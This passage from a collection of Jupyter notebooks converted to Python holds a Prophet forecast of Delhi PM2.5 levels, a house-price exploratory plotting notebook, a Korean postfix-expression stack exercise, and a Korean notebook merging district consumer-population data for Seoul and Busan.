colab={\"base_uri\": \"https://localhost:8080/\"} id=\"W018rz-s7sKh\" outputId=\"5c9e0221-b9de-4ae9-8df6-22a353d7bdf4\"\n# from google.colab import drive\n# drive.mount('/content/drive')\nDATA_DIR = './data'\n\n# + id=\"iLjhUGDmPOef\"\nimport numpy as np\n\n# + id=\"jREb7bp67f89\"\nimport os\nimport pandas as pd\ndata = pd.read_csv(os.path.join(DATA_DIR,'city_day.csv'))\ndelhi_data = data[data['City']=='Delhi']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"KOc3ULQZv0oW\" outputId=\"76d951b1-2253-48b1-e2b2-52a4d070216e\"\nfrom prophet import Prophet\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"2ZZSzxi6vGkd\" outputId=\"8f47930e-b066-4a06-e696-e8bd7c23a0e1\"\ndelhi_data['ds'] = pd.to_datetime(delhi_data['Date'])\ndelhi_data['y'] = delhi_data['PM2.5']\n\n# + id=\"qpZ55wK5Jvj4\"\nmask = (delhi_data['Date']>='2018-07-01') & (delhi_data['Date']<'2019-07-01')\ntest, train = delhi_data.loc[mask],delhi_data.loc[delhi_data['Date']<'2019-01-01']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"IUkE_un-OXvz\" outputId=\"2df90146-7dfa-4e4d-d455-9de17c1af4f9\"\nm1 = Prophet(yearly_seasonality=2000)\nm1.fit(delhi_data)\nfcast1 = m1.predict(test)\n\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"iEEFOsq2Q9Sb\" outputId=\"b6244168-8829-46d9-9952-c41c742ac59e\"\nfrom sklearn.metrics import mean_squared_error\nmse = mean_squared_error(fcast1['yhat'].to_numpy(),test['y'].to_numpy())\nrmse = np.sqrt(mse)\nrmse\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 441} id=\"Jo-j5PDx2tJX\" outputId=\"d63ed50a-23b7-4147-e2f8-03b870d91953\"\nfrom matplotlib import pyplot\nm1.plot(fcast1)\npyplot.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"NxrHNH4AwVnA\" outputId=\"1e13001e-a0e1-4f17-983b-cd62c13b2bc1\"\nm = Prophet()\nm.fit(delhi_data)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 
388} id=\"606aGU2YfZsL\" outputId=\"830b450a-ea09-476d-b853-7243220072af\"\nfrom prophet.plot import plot_yearly\na = plot_yearly(m)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 206} id=\"DZcaW4XZxDyh\" outputId=\"aead4894-75a5-478a-d705-1c570fa1c785\"\nfuture = m.make_future_dataframe(periods=365)\nforecast = m.predict(future)\nforecast[['ds', 'yhat', 'yhat_lower', 'yhat_upper']].tail()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 474} id=\"nENew_VKyWBk\" outputId=\"8bd5e9b4-eccf-4829-bd63-a2afcfeb80ec\"\nfig1 = m.plot(forecast)\nax = fig1.gca()\nax.set_title(\"O3 Forecast\")\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"0eIdh1P9yZG0\" outputId=\"5ba17c47-e5de-4ecd-9a09-568ec5099bd8\"\nfig2 = m.plot_components(forecast)\n\n# + id=\"6MtIOb16ydS2\"\n\n# -\n\n\n\n\n\n\n","repo_name":"hellomasaya/air-pollution-in-delhi","sub_path":"AQI_Prophet.ipynb","file_name":"AQI_Prophet.ipynb","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"35255544468","text":"# + id=\"A2WaoJKerAbn\"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport missingno as msno\n\n# + id=\"SDKiNSXiwAM6\"\ndf=pd.read_csv('house_price.csv')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 300} id=\"oyf7d0dewYXx\" outputId=\"f2dc79d6-1db5-41dd-f7cf-4a7caeb61e50\"\ndf.head()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"o9CqV4vQwbjO\" outputId=\"01d0546e-3542-4d6f-ac9c-1b81fdf29b73\"\npd.options.display.float_format='{:,.2f} %'.format\nprint((df.isnull().sum()/len(df))*100)\npd.options.display.float_format='{:,.2f}%'.format\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 735} id=\"Eyj1cpsuxiwS\" outputId=\"86ecea71-60c2-4efc-99b8-bfb8cbda25e9\"\nmsno.matrix(df,labels=[df.columns],figsize=(30,16))\n\n# + [markdown] id=\"_zeIJ53VylLY\"\n# MSSubClass Attribute\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 725} id=\"92tUonT2yxvF\" outputId=\"2945cd17-643a-4072-8bb6-bc36e004541b\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['MSSubClass'],ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='MSSubClass',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.distplot(df['MSSubClass'],kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\nsns.boxplot(y='MSSubClass',data=df,ax=ax4,palette='pastel')\nax4=plt.title('BoxPlot')\nplt.show()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"HokUpi6f6VOy\" outputId=\"81ea70f0-93a3-405b-ca9f-90c8186d9f47\"\nprint(df['MSZoning'].unique())\n\n# + [markdown] id=\"34J36exp6eJh\"\n# MSZoning\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 723} id=\"QvUPTbOr6H98\" outputId=\"f1d91901-d278-4a7c-93c4-53185dc453e9\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['MSZoning'],ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='MSZoning',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.histplot(df['MSZoning'],kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = 
plt.subplot(2,2,4)\ndf.groupby(['MSZoning']).count().plot(kind='pie',y='Id',autopct='%1.0f%%',ax=ax4)\nax4=plt.xlabel('MSZoning')\nax4=plt.title('Pie Chart')\nplt.show()\n\n# + [markdown] id=\"UbVskrye8TI2\"\n# LotFrontage\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 714} id=\"-c1G3xtu8JhY\" outputId=\"6bf882f3-2b04-4f26-e68d-73ca91978bb3\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\ndf.plot(kind='scatter',x='LotFrontage',y='SalePrice',color='pink',ax=ax1)\nax1=plt.title('Scatter Plot')\nax2 = plt.subplot(2,2,2)\nsns.regplot(x='LotFrontage',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Regression Plot')\nax3 = plt.subplot(2,2,3)\nsns.distplot(df['LotFrontage'],kde=True,color='red',ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\nsns.boxplot(y='LotFrontage',data=df,ax=ax4,palette='pastel')\nax4=plt.title('Box Plot')\nplt.show()\n\n\n# + [markdown] id=\"p6lfHcrC-ORP\"\n# Lot Area\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 711} id=\"86eWnZil-DyA\" outputId=\"6d5a3e38-fce5-4f92-a9d3-49159da8c4e6\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\ndf.plot(kind='scatter',x='LotArea',y='SalePrice',color='pink',ax=ax1)\nax1=plt.title('Scatter Plot')\nax2 = plt.subplot(2,2,2)\nsns.regplot(x='LotArea',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Regression Plot')\nax3 = plt.subplot(2,2,3)\nsns.distplot(df['LotArea'],kde=True,color='red',ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\nsns.boxplot(y='LotArea',data=df,ax=ax4,palette='pastel')\nax4=plt.title('Box Plot')\nplt.show()\n\n# + [markdown] id=\"l5BidpKBDhR7\"\n# GarageQual\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"utlxLgHJDi7y\" outputId=\"42e57968-ad65-43f2-c971-b5c12a4f8462\"\nprint(df['GarageQual'].unique())\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 723} id=\"mpVUpIIZ_3gp\" outputId=\"a63e0472-fbf3-4978-ecf1-70eafcdfce2b\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['GarageQual'].dropna(),ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='GarageQual',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.histplot(df['GarageQual'].dropna(),kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = plt.subplot(2,2,4)\ndf.groupby(['GarageQual']).count().plot(kind='pie',y='Id',autopct='%1.0f%%',ax=ax4)\nax4=plt.xlabel('GarageQual')\nax4=plt.title('Pie Chart')\nplt.show()\n\n# + [markdown] id=\"EJLo0aDwDzJd\"\n# PavedDrive\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"M-wCszXUD0pS\" outputId=\"c36836b7-a192-41ae-c3d7-9958a1a288a6\"\nprint(df['PavedDrive'].unique())\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 723} id=\"jV_S8fDiD3DH\" outputId=\"cc9a9f87-591d-4598-9082-3b7a61c31696\"\nplt.figure(figsize=(16, 12))\nplt.rcParams['axes.facecolor'] = 'black'\nax1 = plt.subplot(2,2,1)\nsns.histplot(data=df['PavedDrive'].dropna(),ax=ax1,color='pink')\nax1=plt.title('Histogram')\nax2 = plt.subplot(2,2,2)\nsns.swarmplot(x='PavedDrive',y='SalePrice',data=df,ax=ax2)\nax2=plt.title('Swarmplot')\nax3 = plt.subplot(2,2,3)\nsns.histplot(df['PavedDrive'].dropna(),kde=True,ax=ax3)\nax3=plt.title('Density Plot')\nax4 = 
plt.subplot(2,2,4)\ndf.groupby(['PavedDrive']).count().plot(kind='pie',y='Id',autopct='%1.0f%%',ax=ax4)\nax4=plt.xlabel('PavedDrive')\nax4=plt.title('Pie Chart')\nplt.show()\n\n","repo_name":"doaa1012/-Visualisation-Projects","sub_path":"House_Price.ipynb","file_name":"House_Price.ipynb","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"71101466984","text":"# https://www.acmicpc.net/problem/1935\n#\n# ![그래프](./image/1.png)\n\n# 후위 표기식은 대표적인 스택 문제이다.\n# 후위 표기식 자체가 스택을 사용하여 계산을 하는 프로그램이기 때문이다.\n\n# +\nn = int(input())\nword = input()\nnum_list = [int(input()) for _ in range(n)]\n\nstack = []\nfor i in word:\n if i.isalpha():\n stack.append(num_list[ord(i) - 65]) # ord() 함수는 하나의 문자열을 인자로 받고 유니코드 정수를 반환한다.(A의 경우 65을 반환한다.)\n else:\n a = stack.pop()\n b = stack.pop()\n \n if i == '+':\n c = b + a # 두 숫자 중, 먼저 들어간 것을 앞에 사용해야 후위 표기식이 완성된다.\n\n elif i == '-':\n c = b - a\n\n elif i == '*':\n c = b * a\n \n elif i == '/':\n c = b / a\n \n stack.append(c)\n\nprint('%.2f' %stack[0]) # 출력은 문제에 맞게 소수점 둘째 자리까지 나타낸다.\n","repo_name":"gukwanglim/programmers","sub_path":"알고리즘/스택/1. (백)후위 표기식2.ipynb","file_name":"1. (백)후위 표기식2.ipynb","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-jupyter-script","pt":"36"} +{"seq_id":"19404482656","text":"# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"9A_kQmx6Doij\" outputId=\"ad057d90-574e-4fbe-84f4-0d396a59b6d4\"\nfrom google.colab import drive\ndrive.mount('/content/gdrive')\n\n# + id=\"4Z8E86wqDy7g\"\nimport io\nimport pandas as pd\n\n# + id=\"B-7tgjtpD588\"\nfile_name1 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_교과학원분야_소비인구.csv'\n\n# + id=\"00hdSNJ3EBvf\"\ndf1 = pd.read_csv(file_name1)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"BvVNgXtvSgps\" outputId=\"5c817c6b-d644-4c1b-c4f4-e8d8a7aee0fb\"\ndf1\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"alf5iqGPim9z\" outputId=\"bcc0f567-b542-4295-bbab-b1ed10e2acad\"\ndf1.info()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"PBtbVgJsFDz8\" outputId=\"233f35d9-a579-4dae-8b01-800770b17c73\"\ndf1\n\n# + id=\"EyL2PpJMSVeX\"\ndf1_s = df1[df1['bntr_nm'] == '서울특별시']\ndf1_b = df1[df1['bntr_nm'] == '부산광역시']\ndf1 = pd.concat([df1_s,df1_b])\n\n# + id=\"vdWFdjXJTUZP\"\ndf1=df1[['bntr_nm','행정동','교과학원분야 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"PxnFs1HmW6F2\" outputId=\"8774791b-7f75-4ddf-974f-906af934be4c\"\ndf1\n\n# + id=\"frEjlEZsTkQ4\"\ndf1 = df1.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"BJj2i7k1TmFf\" outputId=\"25f2d2a0-98ab-46f5-ca09-cf38da01f2e7\"\ndf1\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"1hEEcYFpizKx\" outputId=\"4429b0be-b343-461c-d2f7-f95657656b4b\"\ndf1.info()\n\n# + id=\"zmA0vSNTEFYd\"\nfile_name2 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_동네가게_소비인구_201127.csv'\n\n# + id=\"BGg2NC2YEOqe\"\ndf2 = pd.read_csv(file_name2)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"zSZD5u1xFNXc\" outputId=\"b5e0ea37-edb7-4ec7-adaf-4ed7f589a7b8\"\ndf2\n\n# + id=\"lEFN3owoHat_\"\ndf2= df2[['bntr_nm','행정동','동네가게 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"GhRzbkDvF6Ui\" outputId=\"f53b9d88-e870-4481-f7e1-96c9d38bb260\"\ndf2\n\n# + id=\"Xa7k5H7cI9p-\"\ndf2 = 
df2.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"TtPOnA39JHPd\" outputId=\"89942842-4de9-437d-84bf-6034569ffb7d\"\ndf2\n\n# + id=\"SzoHEvJ5EQ_p\"\nfile_name3 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_약국분야_소비인구_201127.csv'\n\n# + id=\"c0W44DrmEVRt\"\ndf3 = pd.read_csv(file_name3)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"v8E08rL5FPj8\" outputId=\"574654c5-d836-4240-e2dc-c8b8bc2dc107\"\ndf3\n\n# + id=\"6zNQBCXaJK55\"\ndf3_s = df3[df3['bntr_nm'] == '서울특별시']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"DUMOp55uKmS-\" outputId=\"a455b021-31a5-4425-8a54-3b0a31ea853f\"\ndf3_s\n\n# + id=\"Fn89PDp6F-15\"\ndf3_b =df3[df3['bntr_nm'] == '부산광역시']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"e84M3m8IKtgr\" outputId=\"9f0a9a31-0484-41a2-b9e9-6108f56b748d\"\ndf3_b\n\n# + id=\"gySPlbN9KHAU\"\ndf3 = pd.concat([df3_s,df3_b])\n\n# + id=\"ciSdEIIOK4tD\"\ndf3 = df3[['bntr_nm','행정동','약국분야 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"BW7zvbWFGHSA\" outputId=\"f84585c1-d7be-4921-d451-997272ee117c\"\ndf3\n\n# + id=\"b5y3bKq7Lif-\"\ndf3 = df3.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"Cr2FsbRSLrT5\" outputId=\"79573767-cc41-4b2e-c051-7fa7300cc985\"\ndf3\n\n# + id=\"Np1DOOYcEVcZ\"\nfile_name4 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_외식_일식_생선회분야_소비인구(2020.03_2020.05).csv'\n\n# + id=\"b8Anhbs6Ecfu\"\ndf4 = pd.read_csv(file_name4)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"C-1v71sLFRAD\" outputId=\"88d61526-cb63-4c70-c216-727643f7e568\"\ndf4\n\n# + id=\"cKXACoypK_05\"\ndf4_s = df4[df4['brtc_nm'] == '서울특별시']\n\n# + id=\"nGmbTgCALKmk\"\ndf4_b = df4[df4['brtc_nm'] == '부산광역시']\n\n# + id=\"PBDvkxGMLPAU\"\ndf4 = pd.concat([df4_s,df4_b])\n\n# + id=\"2wU54M8TGlB8\"\ndf4 =df4[['brtc_nm','행정동','외식 일식 소비 인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"33_2VgKAGrML\" outputId=\"613b0614-5b3d-41c2-d8f6-fa8740940dbf\"\ndf4\n\n# + id=\"3WAHlby7L2Rr\"\ndf4 = df4.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"1N3wSv8XL6HB\" outputId=\"e638bd3a-8187-4d27-828d-4ae529d73e99\"\ndf4\n\n# + id=\"IotYZJmQEe96\"\nfile_name5 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_외식_중식_양식분야_소비인구(2020.03_2020.05).csv'\n\n# + id=\"6l2L0Ex2EfF7\"\ndf5 = pd.read_csv(file_name5)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"XDBCc3c-MMQg\" outputId=\"48b01d0f-61c1-4749-8e64-58ec644c3b0b\"\ndf5\n\n# + id=\"UaEHQBr8MIQg\"\ndf5_s = df5[df5['brtc_nm'] == '서울특별시']\n\n# + id=\"uIkefjreMT5t\"\ndf5_b = df5[df5['brtc_nm'] == '부산광역시']\n\n# + id=\"GN1DRpTsMWCq\"\ndf5 = pd.concat([df5_s,df5_b])\n\n# + id=\"pq8Mbrq7GtX-\"\ndf5 = df5[['brtc_nm','행정동','중식/양식 소비인구']]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"ZcIyzyosFSj3\" outputId=\"2dba12e9-46cc-4f0f-b6cf-3470dbd5323d\"\ndf5\n\n# + id=\"OOzMT2efL_m4\"\ndf5 = df5.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"O-sPe_-ZMD8Y\" outputId=\"e5054f41-86cf-4656-c11b-f107d84e10ab\"\ndf5\n\n# + id=\"eqnFoIJ7EmX-\"\nfile_name6 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_유흥분야_소비인구_201127.csv'\n\n# + id=\"r8dhAUwKEma3\"\ndf6 = pd.read_csv(file_name6)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", 
\"height\": 424} id=\"lvIK3z-CG7CG\" outputId=\"5c836eb4-64f5-40b3-e52d-8f9a4693e124\"\ndf6\n\n# + id=\"W3hGkpBCM3dB\"\ndf6_s = df6[df6['bntr_nm'] == '서울특별시']\n\n# + id=\"XWiF2Oi-M3kd\"\ndf6_b = df6[df6['bntr_nm'] == '부산광역시']\n\n# + id=\"vmzMMThONLu9\"\ndf6 = pd.concat([df6_s,df6_b])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"_JD_Z2YiG3fH\" outputId=\"f50b0e02-371a-42ee-b53f-b070e9e0c512\"\ndf6[['bntr_nm','행정동','유흥분야 소비인구']]\n\n# + id=\"D_PkYIsxNS9x\"\ndf6 = df6.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"bjfx0-i2NZAz\" outputId=\"c46a966e-31d2-4a86-803a-a2e3141acf43\"\ndf6\n\n# + id=\"J_aPJ6KBEw4A\"\nfile_name7 = '/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_자동차관련분야_소비인구_201127.csv'\n\n# + id=\"wFP9MlMWNWmn\"\n\n\n# + id=\"9sEt44uuEw6g\"\ndf7 = pd.read_csv(file_name7)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"yjx9Ehr_HGlf\" outputId=\"aec140c9-327e-43b9-d7a9-722c3224e0da\"\ndf7\n\n# + id=\"ZQKsRIsbPqjY\"\ndf7_s = df7[df7['bntr_nm'] == '서울특별시']\ndf7_b = df7[df7['bntr_nm'] == '부산광역시']\ndf7 = pd.concat([df7_s,df7_b])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"mBrntbIMHDVe\" outputId=\"6101819b-fbc5-40b0-b792-b3c5f33146a4\"\ndf7[['bntr_nm','행정동','자동차 관련 소비인구']]\n\n# + id=\"DS5j65SbPo1s\"\ndf7 = df7.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"NQSL6eE3P_En\" outputId=\"785db5ba-7a6c-4d2c-8199-4585265651da\"\ndf7\n\n# + id=\"d_BpkzIiE3PM\"\nfile_name8 ='/content/gdrive/MyDrive/기계학습 기초/클러스터링 데이터 셋/행정동별_편의점분야_소비인구_201127.csv'\n\n# + id=\"kHBbE7-7E3SF\"\ndf8 = pd.read_csv(file_name8)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"XBZkWqbBHNDr\" outputId=\"bd9a39d2-2b3b-4545-d998-5f2f56c29632\"\ndf8\n\n# + id=\"3xqSnj57QEJL\"\ndf8_s = df8[df8['bntr_nm'] == '서울특별시']\ndf8_b = df8[df8['bntr_nm'] == '부산광역시']\ndf8 = pd.concat([df8_s,df8_b])\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"28oXNDQPHLUW\" outputId=\"c388fdbf-196d-4d87-a7d4-707b8b94d975\"\ndf8[['bntr_nm','행정동','편의점 소비 인구']]\n\n# + id=\"lbclwIkTHSRX\"\ndf8 = df8.groupby('행정동').sum()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"eZ5RBqXmQO0O\" outputId=\"d518a61a-8e6a-4a1c-f394-669357b116ac\"\ndf8\n\n# + id=\"k0LWDKwUUc5u\"\ndata = pd.merge(df1, df2,how = 'outer', on = '행정동')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 455} id=\"A4jFGWp_Ulkx\" outputId=\"495472ef-2806-4b03-eab0-fc3bb352c771\"\ndata\n\n# + id=\"8j0J7LgFUo9F\"\ndata1 = pd.merge(data, df3 ,how = 'outer', on = '행정동')\n\n# + id=\"NYyhL2j7Uo_X\"\ndata2 = pd.merge(df4, df5 ,how = 'outer', on = '행정동')\n\n# + id=\"SQE5XzmiU2N4\"\ndata3 = pd.merge(df6, df7 ,how = 'outer', on = '행정동')\n\n# + id=\"s4RTRmB2U5mQ\"\ndata4 = pd.merge(data1, df8 ,how = 'outer', on = '행정동')\n\n# + id=\"jUyLa2teVWvC\"\ndata5 = pd.merge(data1, data2 ,how = 'outer', on = '행정동')\n\n# + id=\"FzhKjbDyVW4w\"\nfinal_data = pd.merge(data5, data3 ,how = 'outer', on = '행정동')\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 534} id=\"R8HV5E3JVlGU\" outputId=\"ab51cb73-1115-49a2-ec1c-689504f44bc2\"\nfinal_data\n\n# + id=\"2QyGXrFUTgle\"\nfinal_data = final_data.reset_index()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 502} id=\"Km1FTaaDTokG\" outputId=\"5b7fa7b7-cd70-4c04-ab86-ea6e5d88c717\"\nfinal_data\n\n# + 
id=\"fJ5gp3XZTqQb\"\nfinal_data = final_data[final_data['행정동'] != '소계']\n\n# + id=\"m3TZID8qTtOx\"\ndel final_data['법정동 데이터']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"wV6QgkS4TtV5\" outputId=\"8b4fd951-ae3f-4e8b-89a2-de531fcde1df\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"xcSXyUYGVGvV\" outputId=\"18e3ba51-91e7-4d3c-de0c-ec60c7c08cd6\"\nfinal_data[final_data['유흥분야 소비인구'].isnull()]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"gN1tic01VgUL\" outputId=\"a04d6912-e280-4da8-fb73-e33b148563c1\"\nfinal_data[final_data['자동차 관련 소비인구'].isnull()]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"8fkHrOvTVpvk\" outputId=\"5cef12b1-99ec-40ce-e994-5e1fdf15395a\"\nfinal_data[final_data['교과학원분야 소비인구'].isnull()]\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 468} id=\"ULT_-j7sVp2y\" outputId=\"41f5f3b4-06a8-4f3c-a995-60fd4457d352\"\nfinal_data[final_data['동네가게 소비인구'].isnull()]\n\n# + id=\"6BumFmHsX6Km\"\ndel final_data['행정동 코드']\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"bcOKaSJYWAS8\" outputId=\"a91c01f4-52ac-4686-fdb3-cc4caec5b0a5\"\nfinal_data\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"SrMYrJJAY3My\" outputId=\"332cc97e-272a-4cfa-c07d-c5a4494e4b75\"\nfinal_data.columns\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"EHyqU7d4cump\" outputId=\"b3884040-10cb-4c69-ae25-bf035e03ceea\"\nfinal_data.isnull()\n\n# + id=\"8HpaXx6peUbk\"\nfinal_data['동네가게_소비인구'] = final_data['동네가게 소비인구']\n\n# + id=\"aKjSslmjeewV\"\nfinal_data['유흥분야_소비인구'] = final_data['유흥분야 소비인구']\n\n# + id=\"ypvU_6ilfYj7\"\nfinal_data['교과학원분야_소비인구'] = final_data['교과학원분야 소비인구']\n\n# + id=\"kMx0aAv6fYmm\"\nfinal_data['약국분야_소비인구'] = final_data['약국분야 소비인구']\n\n# + id=\"c2Q7jjNgfY38\"\nfinal_data['자동차관련_소비인구'] = final_data['자동차 관련 소비인구']\n\n# + id=\"8Y9pJnKEeniA\"\nfinal_data = final_data[['행정동','교과학원분야_소비인구', '동네가게_소비인구', '약국분야_소비인구', '외식 일식 소비 인구',\n '중식/양식 소비인구', '유흥분야_소비인구', '자동차관련_소비인구']]\n\n# + id=\"2mX8h7cJYEj2\"\n결측인덱스 = final_data.isnull().query(\"동네가게_소비인구 == True and 유흥분야_소비인구 == True\").index\n\n# + id=\"FoORNTgcf84X\"\n\n\n# + id=\"vIPym6WZfMaG\"\nfinal_data = final_data.drop(결측인덱스, axis = 0)\n\n# + id=\"XkSf_eKigP_D\"\n결측인덱스1 = final_data.isnull().query(\"자동차관련_소비인구 == True and 교과학원분야_소비인구 == True\").index\n\n# + id=\"nlBy6DPFgXzL\"\n\n\n# + id=\"IK98Ug1RgESO\"\nfinal_data = final_data.drop(결측인덱스1, axis = 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"_n7edIiOfUGw\" outputId=\"57e0aa68-32a1-48e5-aa97-8a26464719c7\"\nfinal_data\n\n# + id=\"YRc1bplSgZVP\"\n결측인덱스2 = final_data.isnull().query(\"교과학원분야_소비인구 == True and 동네가게_소비인구 == True\").index\n\n# + id=\"gjZdmsK3ghvB\"\nfinal_data = final_data.drop(결측인덱스2, axis = 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\"} id=\"e7cOVBhfjKDd\" outputId=\"769120fe-d014-40e0-8027-a1c8f2c04eeb\"\nfinal_data.info()\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"xN5Svj_wgolK\" outputId=\"114253a4-1177-47ff-8100-aa6966df39c3\"\nfinal_data\n\n# + id=\"DZVLtWKjjndP\"\nimport numpy as np\n\n# + id=\"zqa6Lt1kjV23\"\nfinal_data = final_data.replace(np.nan, 0)\n\n# + colab={\"base_uri\": \"https://localhost:8080/\", \"height\": 424} id=\"OY5uZWBUjsLJ\" 